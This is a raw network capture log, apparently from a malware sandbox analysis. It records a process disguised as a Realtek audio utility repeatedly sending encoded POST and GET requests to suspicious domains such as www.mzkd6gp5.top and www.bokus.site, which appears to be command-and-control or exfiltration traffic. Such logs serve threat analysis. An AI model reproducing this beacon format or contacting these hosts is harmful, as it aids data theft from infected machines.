Jan 13, 2025 10:25:09.837960958 CET	52	IN	Data Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.11.20	49828	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:14.955183983 CET	799	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d Data Ascii: AuPF3v=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
Jan 13, 2025 10:25:15.532166958 CET	915	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2FXltDMkuoCm2cVuCDun%2BG4bFcmINpqPl%2BYtZs7P2C5qmi8GLi79zQaLpvehh2jY61KglRivv0sDHIX1xL6LdelJEo3GNziqtv0qFo5%2F6%2Fb2LmL6ryc66qmYfnAxHnwRTjGZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90145680c9f90634-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100007&min_rtt=100007&rtt_var=50003&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:25:15.532176018 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	49829	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:17.578967094 CET	819	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d Data Ascii: AuPF3v=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
Jan 13, 2025 10:25:18.147521019 CET	911	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q2H1Hr9tEbtaMMrO%2F5vuZhEcXbhNNiZC%2FiHH3hWUyojhIX822lJcloTQV32qwOeeEN825Hs2BXe9UIqBT1iWQFcY%2FsBVW%2BboSDDV1c0IH6pd9ZA1iTametqoVtDcbuuxx06"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901456912c3a82b1-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99848&min_rtt=99848&rtt_var=49924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:25:18.147531033 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.11.20	49830	104.21.16.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:20.203804970 CET	5156	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 [TRUNCATED] Data Ascii: AuPF3v=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpy [TRUNCATED]
Jan 13, 2025 10:25:20.203855038 CET	2812	OUT	Data Raw: 4a 4f 52 32 37 73 6e 6d 41 6e 72 64 31 33 31 51 6f 51 49 4d 53 32 63 64 30 6d 32 39 51 6b 78 79 4c 6a 4a 48 36 55 34 4e 61 68 4f 47 6a 4b 66 61 67 58 74 6a 55 32 38 39 64 44 4c 78 51 69 75 53 66 54 39 62 33 6a 4c 2b 76 49 54 30 50 6a 4e 4b 47 50 Data Ascii: JOR27snmAnrd131QoQIMS2cd0m29QkxyLjJH6U4NahOGjKfagXtjU289dDLxQiuSfT9b3jL+vIT0PjNKGPWgkuRsiAop5L+YLaRlGPSQLiRTscJBWMlr7Lg1zAGfogYotINg18KRsNL3lm5mLQdFDPPcTvHz8YlW8COJrQPfyAQ1NRXS1VefcIgwn+lFRL7ZsTMleN/3HN7WOXz6uGS4cqTsKqdtpmq56RxLX8eFWG8KBgyH/0I
Jan 13, 2025 10:25:20.776592016 CET	912	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogfCg2yV%2FMqeaqtshNonBI7aLsQIzkbbmoktSvgYDY7JFDnaPcN6fAqvXF5ULN62xjw56pGwEkGHukNNCg%2FH41pVt9pr8M%2FnusqQIYfqgM61GOsdEKI8GIAb%2BoWY678RivYI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901456a1982c578a-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99840&min_rtt=99840&rtt_var=49920&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 13, 2025 10:25:20.776602030 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.11.20	49831	104.21.16.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:22.827586889 CET	530	OUT	GET /3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:25:23.381313086 CET	924	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwQek7EDeSIghLDut3C%2BlKBmE5mVH0Q%2FINxGx%2FXVUqqdJ7VaXLogweFVPqZlznEPe6axTZrpBDvgzPnLN%2BVQ33Prsy3W9A8wcaHmgplxRXhNoFSQ7jJbMTe5Hc7e7CDD6SoP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901456b1f92182b1-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99881&min_rtt=99881&rtt_var=49940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 13, 2025 10:25:23.381323099 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.11.20	49832	199.192.21.169	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:28.565246105 CET	793	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d Data Ascii: AuPF3v=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
Jan 13, 2025 10:25:28.747575998 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:28 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.11.20	49833	199.192.21.169	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:31.265891075 CET	813	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d Data Ascii: AuPF3v=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
Jan 13, 2025 10:25:31.442111015 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:31 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.11.20	49834	199.192.21.169	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:33.957779884 CET	2578	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 